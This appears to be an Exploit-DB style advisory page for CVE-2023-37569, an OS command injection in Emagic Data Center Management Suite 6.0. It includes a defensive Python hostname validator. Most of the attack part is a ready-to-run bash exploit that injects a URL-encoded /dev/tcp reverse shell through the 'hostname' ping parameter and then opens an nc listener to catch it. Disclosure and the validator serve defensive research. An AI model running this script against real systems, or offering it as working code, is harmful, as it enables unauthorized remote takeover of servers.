Vendor: Data Center Management Suite
By: Shubham Pandey & thewhiteh4t
CVSS: 7.5 (HIGH)
CWE: 78 (OS Command Injection)
Product Name: Data Center Management Suite
Affected Version From: 6.0.0
Affected Version To: 6.0.0
Patch Exists: NO
Related CVE: CVE-2023-37569
CPE: a:emagic:data_center_management_suite:6.0.0
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux
2023

Emagic Data Center Management Suite v6.0 – OS Command Injection

This exploit allows remote attackers to execute arbitrary commands on the target system by injecting malicious commands through the 'hostname' parameter in the 'ping' utility of the Emagic Data Center Management Suite v6.0. By exploiting this vulnerability, an attacker can gain unauthorized access and control over the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of Emagic Data Center Management Suite that addresses the OS Command Injection vulnerability.
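
A server-side allow-list check for the 'hostname' value, given here as an added example that is not part of the original page or the vendor's code. The function names are hypothetical, the endpoint path and parameter name are the ones in the request shown on this page, and the sample request bodies are constructed.

```python
import ipaddress
import re
from urllib.parse import parse_qs

# Endpoint and parameter name as they appear in the request on this page.
UTILITY_PATH = "/index.php/monitor/operations/utilities/"
PARAM = "hostname"

# RFC 1123 label: letters, digits, hyphens; no leading or trailing hyphen,
# so a value such as "-c1" cannot be read by ping as an option.
_LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
_HOSTNAME = re.compile(rf"{_LABEL}(?:\.{_LABEL})*")


def is_valid_ping_target(value: str) -> bool:
    """Allow-list: accept only an IP literal or an RFC 1123 hostname."""
    if not value or len(value) > 253:
        return False
    try:
        ip = ipaddress.ip_address(value)
    except ValueError:
        # fullmatch, not match with "$": "$" would accept a trailing newline.
        return _HOSTNAME.fullmatch(value) is not None
    # Python accepts arbitrary text after "%" as an IPv6 zone id; refuse it.
    return getattr(ip, "scope_id", None) is None


def inspect_request(path: str, body: str) -> list:
    """Return the rejected hostname values from one form-encoded POST body."""
    if not path.startswith(UTILITY_PATH):
        return []
    values = parse_qs(body, keep_blank_values=True).get(PARAM, [])
    return [v for v in values if not is_valid_ping_target(v)]


# Constructed sample requests (not captured traffic).
SAMPLES = [
    (UTILITY_PATH, "utility=ping&operations=yes&hostname=192.168.0.10&probe_id=1"),
    (UTILITY_PATH, "utility=ping&operations=yes&hostname=%3B%20id&probe_id=1"),
]

if __name__ == "__main__":
    for path, body in SAMPLES:
        bad = inspect_request(path, body)
        print("REJECT" if bad else "ok", repr(bad))
```

The same check can run in a reverse proxy or log pipeline as a detection rule. Input validation is a compensating control: the underlying fix is for the application to pass the target to ping as a single argument without going through a shell.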

Exploit-DB raw data:

#!/bin/bash

# Exploit Title: Emagic Data Center Management Suite v6.0 - OS Command Injection
# Date: 03-08-2023
# Exploit Author: Shubham Pandey & thewhiteh4t
# Vendor Homepage: https://www.esds.co.in/enlight360
# Version: 6.0.0
# Tested on: Kali Linux
# CVE : CVE-2023-37569

URL=$1
LHOST=$2
LPORT=$3

echo "*****************************"
echo "*  ESDS eMagic 6.0.0 RCE    *"
echo "*  > CVE-2023-37569         *"
echo "*  > Shubham & thewhiteh4t  *"
echo "*****************************"

if [ $# -lt 3 ]; then
    echo """
USAGE :

./exploit.sh http://<IP> <LHOST> <LPORT>
./exploit.sh http://192.168.0.10 192.168.0.20 1337
"""
    exit 1
fi

url="$1/index.php/monitor/operations/utilities/"

echo "[+] URL   : $URL"
echo "[+] LHOST : $LHOST"
echo "[+] LPORT : $LPORT"
echo

payload="bash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F$LHOST%2F$LPORT%200%3E%261%27"

post_data="utility=ping&operations=yes&hostname=%3B%20$payload&param_before=&param_after=&probe_id=1&rndval=1682490204846"

echo "[!] Triggering exploit..."

echo $url

(sleep 3; curl -s -X POST -d $post_data $url > /dev/null) &

echo "[+] Catching shell..."
nc -lvp 4444